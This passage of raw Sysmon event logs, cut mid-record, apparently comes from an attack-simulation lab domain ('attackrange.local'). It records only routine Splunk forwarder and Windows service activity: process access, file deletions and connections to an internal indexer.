Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:28.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.337{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F624-60EB-A379-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.337{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F624-60EB-A379-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.338{0C1E0330-F624-60EB-A379-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:29.650{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE3A5CF4D7A708F821ED3142646E5FF2,SHA256=F24FDD60FA2426631FBACB5F298C7BE6020A7E3A7E53E2F00CDD540237488750,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:29.214{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45DA6CB54F17BC8FCC76C468B4804646,SHA256=BD18BF3A1A151C1643B91590592BB1ED7829508A5173B891714963E2DD3DFAFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:29.384{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=974AF5F28ABC0AE66C264185CAC22665,SHA256=CA263FD174C6DAC6DE77FD31C2B2774061AC718820CBC5CC7D52FFF1ED7FB03B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:30.650{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245CA8BF2665686FAACF9482EEBBAB4C,SHA256=4ABB33458CDE6F069BE024CA6903452A9E18B47F28B1028B6E620F37F9D194E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:30.229{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D213C543AD5D5F0545A48F45CD93B4EE,SHA256=AB6ABE0B5617B7B67BA729824CF756AB5B58E1F69D725D270283CD61BA9F97C1,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:30.150{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=95AEC4CBDFC7D303D19F43D4F1B6127C,SHA256=CD50429BA66470AFC9944D42F8D439E2122FA0642E95B5089D3339622A61DE95,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.282{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57345-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:31.665{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAC5A8918A0807EF9FF388E1E82AAD05,SHA256=4CB9FD3337747A2322D1429A7485F6269CFE99D8C88EC5B9D542F927EA445D7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:23.728{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51112-false10.0.1.12-8000- 23542300x80000000000000001051669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:31.245{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D5EC50ECB265434B11121974E8BCC67,SHA256=07B1831017FE453D5778D17FEF5CDCD141B8014A908954B2E451C7BD27BFBFDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:32.665{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CA00119DFF5D0480947578AEA3E72E6,SHA256=E19BC5B7F9C0AC5EE01ECB7D310B64642C05CEC9BBDF86EF750C3D251DEEDC86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:32.259{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43FF5E89EBD1C995EE35102255B7B8B6,SHA256=9AE9015FFA321CAA1B4FF8EE0A3ACFEDE2C9DA0A9F9E6F10AE21F6EB34D65596,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:33.697{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33E8610C237B13965FCC79615C04BCC,SHA256=5F81FAD0885D396DF3F449F9A39DD1DE2CB1A0BDB404F7B7F5B08123D092DF17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:33.274{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3670CDBD16C5F50AA82E6D0CACE20866,SHA256=BE70B8EF3CE3B496CF2853E40FF91E636B7E1CF0AD7051087AA2FD542CD24C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:34.732{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BD211AA73D739618EED9B44DECE08F4,SHA256=0DBAC0297683E188C386741E448434EA576503BF785B5646AAECCE79841B98D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:34.289{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE085E771AEF102EA611FDDCA9615621,SHA256=DADBF63B2B784E385167FBADC6C7DA778CADC2B8EB667A2F242200AC4BBADEB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:35.748{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F10BEE53374A09E5C28D2C121E11DAE1,SHA256=8BFFDAC2E894336CD3D969906348B93360C693632E09EEC13A00631F47E200F8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:35.305{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0297AF850ABDB11224F05B879E44060,SHA256=98F40E4A186DAA3D6FD7B69F8CDBC421CDFDADCD138EAB2F886099F169AD69BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:33.345{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57346-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:36.764{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=124F1AB43D688E4843196183E7C23EA8,SHA256=95F91B9BE56EA468C9C5F6DB6B2AC2CDF8D9F59A5B9CA17C63767A3AA9F017D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:36.324{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5994F495B5724323B456508564949D93,SHA256=00FAA138D1AA5C03933A723954EC8A2AB9B6FC6400799497DC4FB6A87198F8D5,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:37.795{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A1E94CD57216F53CE206202D94348A6,SHA256=9C9E83C573000F498D696C0E14CB6EF6388714ABDC168A1E4D164AC9D6619C8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:29.723{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51113-false10.0.1.12-8000- 23542300x80000000000000001051676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:37.339{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C028FBCC853BBDAEC18DAF2C693E9E9E,SHA256=5EE27DF189129245EE5A6B35840E4087E4AFE72D63F0952EBB6BC5B7ADDE4F42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:38.811{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17AF21ECD524A2CD67B5244387125E24,SHA256=D96C90ACA80B1FE1242E65B0D2329642796FF537BB8176FB29A80C32D1196C58,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:38.585{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=38468ACF9D265688166FA9E0834A4482,SHA256=EA7BE47DD6915BC131B8EDFC50AF2989AAF5583B8DCF3A40A5BDD819223B37BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:38.353{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E8B7B787C2DB98A0F1CC957481FDF5F,SHA256=DEF928A796213F9CE760A6422862C0754D0D602ED445A4A82CB36EC64A660B49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:39.842{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 